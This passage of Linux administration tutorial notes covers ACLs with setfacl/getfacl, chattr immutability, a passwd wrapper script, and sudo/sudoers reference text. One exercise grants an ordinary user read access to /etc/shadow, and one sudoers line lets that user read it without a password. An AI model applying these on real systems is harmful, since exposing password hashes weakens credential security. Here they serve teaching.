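net/ipv4/conf/all/log_martians = 1
net.ipv4.ip_local_port_range = 2000   65000
"""

# Constructed running values, as sysctl -a would report them before sysctl -p.
SAMPLE_RUNNING = {"net.ipv4.ip_forward": "0", "net.ipv4.conf.default.rp_filter": "1"}

if __name__ == "__main__":
    conf = parse_sysctl_conf(SAMPLE_CONF)
    for key, expected, actual in audit(conf):
        print(f"{key}: expected {expected}, file has {actual}")
    for key, (run, filev) in pending_changes(conf, SAMPLE_RUNNING).items():
        print(f"{key}: running={run} file={filev} (not applied until sysctl -p)")
```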


 

ACL(Access Control List)

 

 

 

An ACL is one of the extended attributes of a file or directory. Using the setfacl command, additional owners or groups can be assigned to a file. The getfacl command can be used to check the extended attribute information. A file's extended attributes are stored in the Shadow Inode.

 

[Figure] Shadow Inode


inode : a file's basic attribute information (what ls -l shows)

Shadow Inode : a file's extended attribute information

 

 

Originally, if users such as user01 and user02 wanted to modify file1, they could be added to the group that holds the group permission, but the permissions could not be set differently for each user. By setting an ACL on the file, file1 can be configured so that multiple users such as user01 and user02 own it in addition to the root user. It can likewise be configured to belong to additional groups.

 

# ls -l file1

-rw-r--r-- 1 root root 0 Mar 23 19:23 file1

 

file1 ownership : root + user01 + ....

file1 group ownership : other + class1 + ....

 

The setfacl command basically plays the same role as the chmod command: it changes the permission mode. With chmod, a file's user permission and group permission are each fixed to a single entry, but with setfacl the user permissions and group permissions on a file can be extended.

 

getfacl(get file access control list) /* command that displays a file's extended attribute information */

setfacl(set file access control list) /* command that sets a file's extended attribute information */

 

# man getfacl

NAME

getfacl - get file access control lists

 

SYNOPSIS

getfacl [-dRLPvh] file ...

 

getfacl [-dRLPvh] -

 

DESCRIPTION

For each file, getfacl displays the file name, owner, the group, and the Access Control List (ACL). If a directory has a default ACL, getfacl also displays the default ACL. Non-directories cannot have default ACLs.

 

If getfacl is used on a file system that does not support ACLs, getfacl displays the access permissions defined by the traditional file mode permission bits.

 

The output format of getfacl is as follows:

1: # file: somedir/

2: # owner: lisa

3: # group: staff

4: user::rwx

5: user:joe:rwx #effective:r-x

6: group::rwx #effective:r-x

7: group:cool:r-x

8: mask:r-x

9: other:r-x

10: default:user::rwx

11: default:user:joe:rwx #effective:r-x

12: default:group::r-x

13: default:mask:r-x

14: default:other:---

 

Lines 4, 6 and 9 correspond to the user, group and other fields of the file mode permission bits. These three are called the base ACL entries. Lines 5 and 7 are named user and named group entries. Line 8 is the effective rights mask. This entry limits the effective rights granted to all groups and to named users. (The file owner and others permissions are not affected by the effective rights mask; all other entries are.) Lines 10--14 display the default ACL associated with this directory. Directories may have a default ACL. Regular files never have a default ACL.

 

The default behavior for getfacl is to display both the ACL and the

default ACL, and to include an effective rights comment for lines where

the rights of the entry differ from the effective rights.

 

If output is to a terminal, the effective rights comment is aligned to

column 40. Otherwise, a single tab character separates the ACL entry

and the effective rights comment.

 

The ACL listings of multiple files are separated by blank lines. The

output of getfacl can also be used as input to setfacl.

 

PERMISSIONS

Processes with search access to a file (i.e., processes with read access

to the containing directory of a file) are also granted read access to

the file’s ACLs. This is analogous to the permissions required for

accessing the file mode.

 

[Command format]

# getfacl file1

# getfacl file1 file2

 

 

[Command options]

Option      Description

-d          Shows the default ACL (of a directory)

-R          Short for recursive: for a directory, also shows the contents of its subdirectories

 

 

# man setfacl

NAME

setfacl - set file access control lists

 

SYNOPSIS

setfacl [-bkndRLPvh] [{-m|-x} acl_spec] [{-M|-X} acl_file] file ...

 

setfacl --restore=file

 

DESCRIPTION

This utility sets Access Control Lists (ACLs) of files and directories.

On the command line, a sequence of commands is followed by a sequence

of files (which in turn can be followed by another sequence of commands, ...).

 

The options -m, and -x expect an ACL on the command line. Multiple ACL

entries are separated by comma characters (‘,’). The options -M, and -X

read an ACL from a file or from standard input. The ACL entry format is

described in Section ACL ENTRIES.

 

The --set and --set-file options set the ACL of a file or a directory.

The previous ACL is replaced. ACL entries for this operation must

include permissions.

 

The -m (--modify) and -M (--modify-file) options modify the ACL of a

file or directory. ACL entries for this operation must include permissions.

 

The -x (--remove) and -X (--remove-file) options remove ACL entries.

Only ACL entries without the perms field are accepted as parameters,

unless POSIXLY_CORRECT is defined.

 

When reading from files using the -M, and -X options, setfacl accepts

the output getfacl produces. There is at most one ACL entry per line.

After a Pound sign (‘#’), everything up to the end of the line is

treated as a comment.

 

If setfacl is used on a file system which does not support ACLs, setfacl

operates on the file mode permission bits. If the ACL does not fit

completely in the permission bits, setfacl modifies the file mode permission

bits to reflect the ACL as closely as possible, writes an error

message to standard error, and returns with an exit status greater than

0.

 

EXAMPLES

Granting an additional user read access

setfacl -m u:lisa:r file

 

Revoking write access from all groups and all named users (using the

effective rights mask)

setfacl -m m::rx file

 

Removing a named group entry from a file’s ACL

setfacl -x g:staff file

 

Copying the ACL of one file to another

getfacl file1 | setfacl --set-file=- file2

 

Copying the access ACL into the Default ACL

getfacl --access dir | setfacl -d -M- dir

 

[Command format]

# setfacl -m [acl] file1 /* -m: modify */

# setfacl -x [acl] file1 /* -x: delete */

 

 

[Command options]

Option      Description

-m          Short for modify: assigns or changes a permission entry

-x          Removes a permission entry

-R          Short for recursive: for a directory, also changes the permissions of subdirectories and files

-b          Removes all assigned ACL entries, including the mask

 

[EX] Changing and removing the user and group entries in a file's attribute information

 

System used

- linux200

 

chmod CMD = setfacl -m

 

(linux200)

 

# cd /test

# rm -rf /test/*

 

# touch file1

# ls -l file1

-rw-r--r-- 1 root root 0 614 14:19 file1

 

# getfacl file1

# file: file1

# owner: root

# group: root

user::rw-

group::r--

other::r--

 

# chmod 664 file1

# ls -l file1

-rw-rw-r-- 1 root root 0 127 03:51 file1

 

# getfacl file1

# file: file1

# owner: root

# group: root

user::rw-

group::rw-

other::r--

 

# setfacl -m user::rwx file1

# ls -l file1

-rwxrw-r-- 1 root root 0 127 03:51 file1

 

# getfacl file1

# file: file1

# owner: root

# group: root

user::rwx

group::rw-

other::r--

 

 

 

 

 

[EX] Adding a new user and a new group to a file

 

# setfacl -m user::rwx file1

# setfacl -m u::7 file1

user = u

group = g

other = o

 

rwx = 7

r-- = 4

 

# getfacl file1

# file: file1

# owner: root

# group: root

user::rwx

group::rw-

other::r--

 

# setfacl -m u:user01:7 file1

# ls -l file1

-rwxrwxr--+ 1 root root 0 127 03:51 file1

 

# getfacl file1

# file: file1

# owner: root

# group: root

user::rwx

user:user01:rwx

group::rw-

mask::rwx

other::r--

 

# groupadd class1

# grep class /etc/group

 

# setfacl -m g:class1:7 file1

# getfacl file1


# file: file1

# owner: root

# group: root

user::rwx

user:user01:rwx

group::rw-

group:class1:rwx

mask::rwx

other::r--

 

# setfacl -x u:user01 file1 (# setfacl -x u:user01:rwx file1)

# getfacl file1


# file: file1

# owner: root

# group: root

user::rwx

group::rw-

group:class1:rwx

mask::rwx

other::r--

 

 

 

 

# setfacl -x g:class1 file1

# getfacl file1


# file: file1

# owner: root

# group: root

user::rwx

group::rw-

mask::rw-

other::r--

 

 

 

[EX] Letting an ordinary user (user01) write to a file owned by root

# cd /test

# rm -rf /test/*

 

# echo 1111 > file1

# ls -l file1

-rw-r--r-- 1 root root 5 Oct 15 21:02 file1

 

 

# setfacl -m u:user01:7 file1

# getfacl file1

# file: file1

# owner: root

# group: root

user::rw-

user:user01:rwx

group::r--

mask::rwx

other::r--

 

# su user01

$ echo 2222 >> file1

$ cat file1

1111

2222

 

$ exit

#

 

[EX] Creating files that keep the same extended attribute (ACL) information

 

# cd /test

# rm -rf /test/*

 

# touch file1 file2 file3 file4

# setfacl -m u:user01:7 file1

# getfacl file1

# file: file1

# owner: root

# group: root

user::rwx

user:user01:rwx

group::r--

mask::rwx

other::r--

 

# getfacl file1 > file.acl

# setfacl --set-file=file.acl file2

# getfacl file1 | setfacl --set-file=- file2

 

# getfacl file1 file2

# file: file1

# owner: root

# group: root

user::rw-

user:user01:rwx

group::r--

mask::rwx

other::r--

 

# file: file2

# owner: root

# group: root

user::rw-

user:user01:rwx

group::r--

mask::rwx

other::r--

 

 

[EX] About the mask and effective values

---------------------------

# file: file1

# owner: root

# group: root

user::rw-

user:user01:rwx

group::r--

group:class1:rwx

mask::rwx

other::r--

---------------------------

 

# cd /test

# rm -rf /test/*

 

# echo 1111 > file1

# getfacl file1

 

# setfacl -m u:user01:7 file1

# setfacl -m g:class1:7 file1

# getfacl file1

 

# setfacl -m m::6 file1

# getfacl file1

 

# setfacl -m m::1 file1

# getfacl file1

 

[EX] A directory's extended attribute information (Default ACL)

 

# mkdir dir1

# setfacl -m d:u::7,d:g::5,d:o::5 dir1 (# setfacl -m d:u::rwx,d:g::r-x,d:o:r-x dir1)

# ls -ld dir1

drwxr-xr-x+ 2 root root 4096 127 04:14 dir1

 

# getfacl dir1

# file: dir1

# owner: root

# group: root

user::rwx

group::r-x

other::r-x

default:user::rwx

default:group::r-x

default:other::r-x

 

# setfacl -m d:u:user01:7,d:m::5 dir1 (# setfacl -m default:user:user01:rwx,d:m::r-x dir1)

# getfacl dir1

# file: dir1

# owner: root

# group: root

user::rwx

group::r-x

other::r-x

default:user::rwx

default:user:user01:rwx #effective:r-x

default:group::r-x

default:mask::r-x

default:other::r-x

 

# mkdir dir1/subdir1

# getfacl dir1/subdir1

# file: dir1/subdir1

# owner: root

# group: root

user::rwx

user:user01:rwx #effective:r-x

group::r-x

mask::r-x

other::r-x

default:user::rwx

default:user:user01:rwx #effective:r-x

default:group::r-x

default:mask::r-x

default:other::r-x

 

# setfacl -m d:u::7,d:g::7,d:o::7,d:m::7 dir1

# setfacl -m d:u::rwx,d:group::rwx,d:other:rwx,d:mask:rwx dir1

# getfacl dir1

# file: dir1

# owner: root

# group: root

user::rwx

group::r-x

other::r-x

default:user::rwx

default:user:user01:rwx

default:group::rwx

default:mask::rwx

default:other::rwx

 

# getfacl dir1/subdir1

# file: dir1/subdir1

# owner: root

# group: root

user::rwx

user:user01:rwx #effective:r-x

group::r-x

mask::r-x

other::r-x

default:user::rwx

default:user:user01:rwx #effective:r-x

default:group::r-x

default:mask::r-x

default:other::r-x

 

# mkdir dir1/subdir2

# getfacl dir1/subdir2

# file: dir1/subdir2

# owner: root

# group: root

user::rwx

user:user01:rwx

group::rwx

mask::rwx

other::rwx

default:user::rwx

default:user:user01:rwx

default:group::rwx

default:mask::rwx

default:other::rwx
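The mask/effective exercise and the default-ACL exercise above both come down to two rules: how the mask entry limits the group class, and how a new object inherits a directory's default ACL. The following Python model of both is an added example, not part of the original notes; the sample ACL text is taken from the getfacl output above, and the inheritance rule follows the kernel's posix_acl_create().

```python
"""POSIX ACL behaviour from the getfacl/setfacl notes above, modelled in Python.

Added example, not part of the original notes: how setfacl -m recomputes the mask,
how getfacl derives '#effective:', and how an object created under a directory with
a default ACL gets its ACL (posix_acl_create(): mode ANDed with the default ACL, no
umask, which is why subdir2 above ends up world-writable)."""
TAG = {'u': 'user', 'g': 'group', 'm': 'mask', 'o': 'other'}      # also gives the output order

def to_bits(perms):
    """'rwx' -> 7, 'r-x' -> 5; setfacl also accepts one octal digit ('7')."""
    bits = {'r': 4, 'w': 2, 'x': 1}
    return int(perms) & 7 if perms.isdigit() else sum(bits[c] for c in perms if c in bits)

def to_perms(bits):
    return ('r' if bits & 4 else '-') + ('w' if bits & 2 else '-') + ('x' if bits & 1 else '-')

def parse_entry(spec):
    """'u:user01:7', 'default:user::rwx', 'm::6', 'g:class1' -> (is_default, tag, qual, bits)."""
    parts = spec.strip().split(':')
    is_default = parts[0] in ('d', 'default')
    if is_default:
        parts = parts[1:]
    tag = TAG[parts[0][0]]
    if tag in ('user', 'group'):                 # u[ser]:uid[:perms]
        qual = parts[1] if len(parts) > 1 else ''
        perms = parts[2] if len(parts) > 2 else None
    else:                                        # m[ask][:][:perms], o[ther][:][:perms]
        qual, perms = '', (parts[-1] if len(parts) > 1 and parts[-1] else None)
    return is_default, tag, qual, (None if perms is None else to_bits(perms))

def parse_acl(text):
    """getfacl output -> (access ACL, default ACL), each a dict keyed by (tag, qualifier)."""
    access, default = {}, {}
    for line in text.splitlines():
        line = line.split('#')[0].strip()        # drops '# file:' headers and '#effective:' notes
        if line:
            is_default, tag, qual, bits = parse_entry(line)
            (default if is_default else access)[(tag, qual)] = bits
    return access, default

def recompute_mask(acl):
    """setfacl's default for an extended ACL: mask = union of the owning group,
    named users and named groups (the 'group class')."""
    if ('mask', '') in acl or any(qual for _, qual in acl):
        union = 0
        for (tag, qual), bits in acl.items():
            union |= bits if (qual or tag == 'group') else 0
        acl[('mask', '')] = union

def modify(acl, *specs):
    """Model of `setfacl -m spec,...`; an explicit m:: entry is kept as given."""
    acl, explicit_mask = dict(acl), False
    for spec in specs:
        _, tag, qual, bits = parse_entry(spec)
        acl[(tag, qual)] = bits
        explicit_mask = explicit_mask or tag == 'mask'
    if not explicit_mask:
        recompute_mask(acl)
    return acl

def effective(acl):
    """getfacl's rule: the mask limits named users, the owning group and named
    groups; the owner entry and 'other' are never masked."""
    mask = acl.get(('mask', ''))
    def eff(tag, qual, bits):
        return bits & mask if mask is not None and (qual or tag == 'group') else bits
    return [(tag, qual, bits, eff(tag, qual, bits)) for (tag, qual), bits in
            sorted(acl.items(), key=lambda kv: (list(TAG.values()).index(kv[0][0]), kv[0][1]))]

def format_acl(acl, prefix=''):
    """Render like getfacl, adding '#effective:' where the mask cuts an entry down."""
    lines = []
    for tag, qual, bits, eff in effective(acl):
        line = '%s%s:%s:%s' % (prefix, tag, qual, to_perms(bits))
        lines.append(line if eff == bits else line + '\t#effective:' + to_perms(eff))
    return lines

def ls_mode(acl, is_dir=False):
    """ls -l mode column: the group triplet shows the mask when one exists, '+' marks an ACL."""
    mask = acl.get(('mask', ''))
    extended = mask is not None or any(qual for _, qual in acl)
    group_bits = acl[('group', '')] if mask is None else mask
    return (('d' if is_dir else '-') + to_perms(acl[('user', '')]) + to_perms(group_bits)
            + to_perms(acl[('other', '')]) + ('+' if extended else ''))

def create_child(parent_default, mode, is_dir):
    """Kernel rule: copy the parent's default ACL, AND owner / mask (or owning group if
    no mask) / other with the creation mode (0777 mkdir, 0666 touch), apply no umask;
    a new directory also inherits the default ACL. Returns (access ACL, default ACL)."""
    acl = dict(parent_default)
    acl[('user', '')] &= (mode >> 6) & 7
    acl[('other', '')] &= mode & 7
    acl[('mask', '') if ('mask', '') in acl else ('group', '')] &= (mode >> 3) & 7
    return acl, (dict(parent_default) if is_dir else {})

if __name__ == '__main__':                       # the notes' file1 after setfacl -m m::6
    acl, _ = parse_acl('user::rw-\nuser:user01:rwx\ngroup::r--\ngroup:class1:rwx\nmask::rwx\nother::r--')
    print('\n'.join(format_acl(modify(acl, 'm::6'))))
```

Running it shows user01 and class1 dropping to `#effective:rw-` under a mask of 6; with `m::1` the owning group's `r--` becomes `#effective:---` while the owner and other are untouched.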

 

 

 

 

 

 

 

 

 

[Additional exercise]

 

Goal

/test/dir1/file1

-> user01 (r)

-> user02 (rw)

-> user03 (rwx)

 

Create the file

# vi /test/dir1/file1

--------------------------

#!/bin/bash

echo "test messages"

--------------------------

# chmod 700 /test/dir1/file1

# ls -l /test/dir1/file1

-rwx------ 1 root root 33 Jun 7 11:56 /test/dir1/file1

# /test/dir1/file1

-> Runs normally.

 

Add the users

# egrep '(user01|user02|user03)' /etc/passwd

# useradd user01

# useradd user02

# useradd user03

# echo user01 | passwd --stdin user01

# echo user02 | passwd --stdin user02

# echo user03 | passwd --stdin user03

 

 

# su - user01

$ cat /test/dir1/file1

$ exit

 

# setfacl -m u:user01:4 /test/dir1/file1

# setfacl -m u:user02:6 /test/dir1/file1

# setfacl -m u:user03:7 /test/dir1/file1

# getfacl /test/dir1/file1

# file: test/dir1/file1

# owner: root

# group: root

user::rwx

user:user01:r--

user:user02:rw-

user:user03:rwx

group::---

mask::rwx

other::---

 

# su - user01

(0) $ cat /test/dir1/file1

(X) $ /test/dir1/file1

 

$ su - user02

(0) $ cat /test/dir1/file1

(0) $ echo "echo test messages2" >> /test/dir1/file1

$ cat /test/dir1/file1

(X) $ /test/dir1/file1

 

$ su - user03

(0) $ cat /test/dir1/file1

(0) $ /test/dir1/file1

 

$ exit

$ exit

$ exit

 

 

 

[EX] Letting a specified ordinary user read the /etc/shadow file

# id

# ls -l /etc/shadow

# setfacl -m u:user01:4 /etc/shadow

# su - user01

$ cat /etc/shadow

 

(Restore) Be sure to restore the settings of the /etc/shadow file.

# setfacl -x u:user01 /etc/shadow

 

 

[EX] Preventing only a specified user from reading a file

$ exit

# cd /test

# echo 1111 > file.txt

# chmod 777 file.txt

# setfacl -m u:user01:0 file.txt

# su - user01

$ cat /test/file.txt

 

 

 

 

 

Considerations when working on Linux: allow/deny, target, privilege escalation

 

SELinux (RBAC, Role-Based Access Control) -> allow  file (user/role/process/security level)  X

sudo CMD, /etc/sudoers -> allow  file (CMD)  O

File ACL (getfacl/setfacl) -> allow  file (user/group)

lsattr/chattr CMD -> deny  file (mode)  X

ex) i, a

 

CMD1, which a user may run

CMD2, which only the administrator may run

What if a user wants to run CMD2? sudo, role (SELinux, MLS)

 

File1, which a user may manage

File2, which the administrator manages

What if a user wants to manage File2? ACL, sudo, user (SELinux)

 

To control a process (a running program)? process (SELinux)

 

# ls -l /etc/shadow

-r-------- 1 root root 1.4K May 24 12:38 /etc/shadow

 

# su - user01

$ cat /etc/shadow

-> error (permission denied)

 

(Solution 1) # setfacl -m u:user01:4 /etc/shadow

(Solution 2) # echo "user01 ALL=NOPASSWD: /bin/cat /etc/shadow" >> /etc/sudoers

 

 

 

 

lsattr CMD / chattr CMD

 

# man lsattr

NAME

 

lsattr - list file attributes on a Linux second extended file

system

 

SYNOPSIS

lsattr [ -RVadv ] [ files... ]

 

DESCRIPTION

lsattr lists the file attributes on a second extended file

system. See chattr(1) for a description of the attributes and

what they mean.

 

# cd /test && rm -rf /test/* && touch file1

# lsattr file1

------------- file1

 

# man chattr

NAME

chattr - change file attributes on a Linux second extended

file system

 

SYNOPSIS

chattr [ -RV ] [ -v version ] [ mode ] files...

 

DESCRIPTION

chattr changes the file attributes on a Linux second extended

file system.

 

The format of a symbolic mode is +-=[ASacDdIijsTtu].

 

The operator ‘+’ causes the selected attributes to be added to

the existing attributes of the files; ‘-’ causes them to be

removed; and ‘=’ causes them to be the only attributes that

the files have.

 

ATTRIBUTES

A file with the ‘a’ attribute set can only be open in append

mode for writing. Only the superuser or a process possessing

the CAP_LINUX_IMMUTABLE capability can set or clear this

attribute.

 

A file with the ‘i’ attribute cannot be modified: it cannot be

deleted or renamed, no link can be created to this file and no

data can be written to the file. Only the superuser or a process

possessing the CAP_LINUX_IMMUTABLE capability can set or

clear this attribute.

 

 

Important files on the system

/etc/inittab

/etc/passwd

/etc/shadow

/etc/hosts

........

 

File involved in booting: /etc/inittab

 

Goal: configure the /etc/inittab file so that content can only be appended to it

 

Append to the file's content

Change the file's content

Delete from the file's content

 

Rename the file

Delete the file

 

# mkdir -p /backup

# cp /etc/inittab /backup

 

# cp /etc/inittab /test

# cd /test

 

# ls -l inittab

-rw-r--r-- 1 root root 1.7K Jun 7 12:28 inittab

 

# lsattr inittab

------------- inittab

 

# chattr +a inittab

# lsattr inittab

-----a------- inittab

 

Append to the file's content

# echo "k:5:once:/etc/rc.local" >> inittab (appending is allowed)

Change the file's content

# vi inittab (changing is not allowed)

Delete from the file's content

# vi inittab (deleting is not allowed)

 

Rename the file

# mv inittab inittab.old (renaming is not allowed)

mv: cannot move `inittab' to `inittab.old': Operation not permitted

Delete the file

# rm -f inittab

rm: cannot remove `inittab': Operation not permitted

 

# chattr -a inittab

# lsattr inittab

------------- inittab

 

# chattr +i inittab

# lsattr inittab

----i-------- inittab

 

Append to the file's content

# echo "k:5:once:/etc/rc.local" >> inittab (appending is not allowed)

Change the file's content

# vi inittab (changing is not allowed)

Delete from the file's content

# vi inittab (deleting is not allowed)

 

Rename the file

# mv inittab inittab.old (renaming is not allowed)

mv: cannot move `inittab' to `inittab.old': Operation not permitted

Delete the file

# rm -f inittab

rm: cannot remove `inittab': Operation not permitted

 

# chattr -i inittab

 

 

 

 

 

 

# vi passwd.sh

----------------------------------------

#!/bin/bash

# Wrapper around the real passwd binary (renamed to passwd.old): /etc/passwd and

# /etc/shadow stay immutable (+i) except while passwd itself is running.

chattr -i /etc/passwd

chattr -i /etc/shadow

passwd.old "$@"

chattr +i /etc/passwd

chattr +i /etc/shadow

----------------------------------------

 

 

 

 

 

 

 

 

Posted by 22Hz

 

 

 

Linux and Unix sudo command

 

 

 

 

 

 

 

INDEX

---------------------------------------------------

1. sudo CMD

1.1 About the sudo command

1.2 sudo command syntax

1.3 sudo description

1.4 sudo command options

1.5 sudo command examples

2. /etc/sudoers file

2.1 About the /etc/sudoers file

2.2 Comparison of the /etc/sudoers file across Linux distributions

3. sudo exercises

---------------------------------------------------

 

 

 

Why the sudo command is needed

 

user01 (backup: dump/restore CMD) ----> su CMD ---> root user (dump/restore CMD)

 

user01 (backup: dump/restore CMD) ----> sudo CMD --->

/etc/sudoers

user01 ALL=dump restore

 

Advantages of using the sudo mechanism

() An ordinary user (EX: user01) does not need to know the administrator's (EX: root) password to do the work.

() The range of commands an ordinary user may run as the administrator is specified.

 

 

1. sudo CMD

 

(1) About sudo

 

sudo ("superuser do") allows a user with proper permissions to execute a command as another user, such as the superuser.

 

 

(2) sudo syntax

 

sudo -V | -h | -l | -L | -v | -k | -K | -s | [ -H ] [-P ] [-S ] [ -b ] |

[ -p prompt ] [ -c class|- ] [ -a auth_type ] [-r role ] [-t type ]

[ -u username|#uid ] command

 

 

(3) sudo description

 

sudo allows a permitted user to execute a command as another user, according to specifications in the /etc/sudoers file. The real and effective uid and gid of the issuing user are then set to match those of the target user account as specified in the passwd file.

 

By default, sudo requires that users authenticate themselves with a password. By default this is the user's password, not the root password itself.

 

Once a user has been authenticated, a timestamp is recorded and the user may use sudo without a password for a short period of time (5 minutes, unless configured differently in sudoers). This timestamp can be renewed if the user issues sudo with the -v flag.

 

If a user not listed in sudoers tries to run a command using sudo, it is considered an unsuccessful attempt to breach system security and mail is sent to the proper authorities, as defined at configure time or in the sudoers file. The default authority to be notified of unsuccessful sudo attempts is root. Note that the mail will not be sent if an unauthorized user tries to run sudo with the -l or -v flags; this allows users to determine for themselves whether or not they are allowed to use sudo.

 

sudo can log both successful and unsuccessful attempts (as well as errors) to syslog, a unique log file, or both. By default sudo will log to syslog but this can be changed at configure time or in the sudoers file.

 

 

(4) sudo OPTIONS

 

-V option

The -V (version) option causes sudo to print the version number and exit. If the invoking user is already root, the -V option will print out a list of the defaults sudo was compiled with as well as the machine's local network addresses.

 

-l option

The -l (list) option will print out the commands allowed (and forbidden) the user on the current host.

 

-L option

The -L (list defaults) option will list out the parameters that may be set in a Defaults line along with a short description for each. This option is useful in conjunction with grep.

 

-h option

The -h (help) option causes sudo to print a usage message and exit.

 

-v option

If given the -v (validate) option, sudo will update the user's timestamp, prompting for the user's password if necessary. This extends the sudo timeout for another 5 minutes (or whatever the timeout is set to in sudoers) but does not run a command.

 

-k option

The -k (kill) option to sudo invalidates the user's timestamp by setting the time on it to the epoch. The next time sudo is run a password will be required. This option does not require a password and was added to allow a user to revoke sudo permissions from a .logout file.

 

-K option

The -K (sure kill) option to sudo removes the user's timestamp entirely. Likewise, this option does not require a password.

 

-b option

The -b (background) option tells sudo to run the given command in the background. Note that if you use the -b option you cannot use shell job control to manipulate the process.

 

-p option

The -p (prompt) option allows you to override the default password prompt and use a custom one. The following percent ('%') escapes are supported:

 

%u is expanded to the invoking user's login name;

 

%U is expanded to the login name of the user the command will be run as (which defaults to root);

 

%h is expanded to the local hostname without the domain name;

 

%H is expanded to the local hostname including the domain name (only if the machine's hostname is fully qualified or the "fqdn" sudoers option is set);

 

%% (two consecutive % characters) are collapsed into a single % character.

 

-c option

The -c (class) option causes sudo to run the specified command with resources limited by the specified login class. The class argument can be either a class name as defined in /etc/login.conf, or a single '-' character. Specifying a class of - indicates that the command should be run restricted by the default login capabilities for the user the command is run as. If the class argument specifies an existing user class, the command must be run as root, or the sudo command must be run from a shell that is already root. This option is only available on systems with BSD login classes where sudo has been configured with the --with-logincap option.

 

-a option

The -a (authentication type) option causes sudo to use the specified authentication type when validating the user, as allowed by /etc/login.conf. The system administrator may specify a list of sudo-specific authentication methods by adding an "auth-sudo" entry in /etc/login.conf. This option is only available on systems that support BSD authentication where sudo has been configured with the --with-bsdauth option.

 

-u option

The -u (user) option causes sudo to run the specified command as a user other than root. To specify a uid instead of a username, use #uid.

 

-s option

The -s (shell) option runs the shell specified by the SHELL environment variable if it is set or the shell as specified in the file passwd.

 

-H option

The -H (HOME) option sets the HOME environment variable to the home directory of the target user (root by default) as specified in passwd. By default, sudo does not modify HOME.

 

-P option

The -P (preserve group vector) option causes sudo to preserve the user's group vector unaltered. By default, sudo will initialize the group vector to the list of groups the target user is in. The real and effective group IDs, however, are still set to match the target user.

 

-r option

The -r (role) option causes the new (SELinux) security context to have the role specified by ROLE.

 

-t option

The -t (type) option causes the new (SELinux) security context to have the type (domain) specified by TYPE. If no type is specified, the default type is derived from the specified role.

 

-S option

The -S (stdin) option causes sudo to read the password from standard input instead of the terminal device.

 

-- option

The -- flag indicates that sudo should stop processing command line arguments. It is most useful in conjunction with the -s flag.

 

 

(5) sudo CMD Examples

 

$ sudo -u comphope ls /home/comphope/hope

List the contents of the /home/comphope/hope directory as the comphope user.

 

$ sudo -v

Extend/reset sudo's automatic authentication timeout, allowing you to continue issuing sudo commands without entering a password.

 

$ sudo -k

"Kill" sudo authentication for the current user. The next sudo command will require a password.

 

 

(6) Reference

 

http://www.computerhope.com/unix/sudo.htm

 

 

 

 

 

 

2. /etc/sudoers file

 

(1) About the /etc/sudoers file

 

NAME

sudoers - default sudo security policy module

 

DESCRIPTION

The sudoers policy module determines a user's sudo privileges. It is the default

sudo policy plugin. The policy is driven by the /etc/sudoers file or, optionally

in LDAP. The policy format is described in detail in the "SUDOERS FILE FORMAT"

section. For information on storing sudoers policy information in LDAP, please

see sudoers.ldap(5).

 

SUDOERS FILE FORMAT

The sudoers file is composed of two types of entries: aliases (basically

variables) and user specifications (which specify who may run what).

 

When multiple entries match for a user, they are applied in order. Where there

are multiple matches, the last match is used (which is not necessarily the most

specific match).

 

The sudoers grammar will be described below in Extended Backus-Naur Form (EBNF).

Don't despair if you don't know what EBNF is; it is fairly simple, and the

definitions below are annotated.

 

Quick guide to EBNF

EBNF is a concise and exact way of describing the grammar of a language. Each

EBNF definition is made up of production rules. E.g.,

 

symbol ::= definition | alternate1 | alternate2 ...

 

Each production rule references others and thus makes up a grammar for the

language. EBNF also contains the following operators, which many readers will

recognize from regular expressions. Do not, however, confuse them with

"wildcard" characters, which have different meanings.

 

? Means that the preceding symbol (or group of symbols) is optional. That is,

it may appear once or not at all.

 

* Means that the preceding symbol (or group of symbols) may appear zero or more

times.

 

+ Means that the preceding symbol (or group of symbols) may appear one or more

times.

 

Parentheses may be used to group symbols together. For clarity, we will use

single quotes ('') to designate what is a verbatim character string (as opposed

to a symbol name).

 

Aliases

There are four kinds of aliases: User_Alias, Runas_Alias, Host_Alias and

Cmnd_Alias.

 

Alias ::= 'User_Alias' User_Alias (':' User_Alias)* |

'Runas_Alias' Runas_Alias (':' Runas_Alias)* |

'Host_Alias' Host_Alias (':' Host_Alias)* |

'Cmnd_Alias' Cmnd_Alias (':' Cmnd_Alias)*

 

User_Alias ::= NAME '=' User_List

 

Runas_Alias ::= NAME '=' Runas_List

 

Host_Alias ::= NAME '=' Host_List

 

Cmnd_Alias ::= NAME '=' Cmnd_List

 

NAME ::= [A-Z]([A-Z][0-9]_)*

 

Each alias definition is of the form

 

Alias_Type NAME = item1, item2, ...

 

dgb boulder = (operator) /bin/ls, /bin/kill, /usr/bin/lprm

 

The user dgb may run /bin/ls, /bin/kill, and /usr/bin/lprm -- but only as

operator. E.g.,

 

$ sudo -u operator /bin/ls

 

It is also possible to override a Runas_Spec later on in an entry. If we modify

the entry like so:

 

dgb boulder = (operator) /bin/ls, (root) /bin/kill, /usr/bin/lprm

 

Then user dgb is now allowed to run /bin/ls as operator, but /bin/kill and

/usr/bin/lprm as root.

 

We can extend this to allow dgb to run /bin/ls with either the user or group set

to operator:

 

dgb boulder = (operator : operator) /bin/ls, (root) /bin/kill, \

/usr/bin/lprm

 

 

ray rushmore = NOPASSWD: /bin/kill, /bin/ls, /usr/bin/lprm

 

ray rushmore = NOPASSWD: /bin/kill, PASSWD: /bin/ls, /usr/bin/lprm

 

aaron shanty = NOEXEC: /usr/bin/more, /usr/bin/vi

 

 

/etc/sudoers example file

 

# Run X applications through sudo; HOME is used to find the

# .Xauthority file. Note that other programs use HOME to find

# configuration files and this may lead to privilege escalation!

Defaults env_keep += "DISPLAY HOME"

 

# User alias specification

User_Alias FULLTIMERS = millert, mikef, dowdy

User_Alias PARTTIMERS = bostley, jwfox, crawl

User_Alias WEBMASTERS = will, wendy, wim

 

# Runas alias specification

Runas_Alias OP = root, operator

Runas_Alias DB = oracle, sybase

Runas_Alias ADMINGRP = adm, oper

 

# Host alias specification

Host_Alias SPARC = bigtime, eclipse, moet, anchor :\

SGI = grolsch, dandelion, black :\

ALPHA = widget, thalamus, foobar :\

HPPA = boa, nag, python

Host_Alias CUNETS = 128.138.0.0/255.255.0.0

Host_Alias CSNETS = 128.138.243.0, 128.138.204.0/24, 128.138.242.0

Host_Alias SERVERS = master, mail, www, ns

Host_Alias CDROM = orion, perseus, hercules

 

# Cmnd alias specification

Cmnd_Alias DUMPS = /usr/bin/mt, /usr/sbin/dump, /usr/sbin/rdump,\

/usr/sbin/restore, /usr/sbin/rrestore

Cmnd_Alias KILL = /usr/bin/kill

Cmnd_Alias PRINTING = /usr/sbin/lpc, /usr/bin/lprm

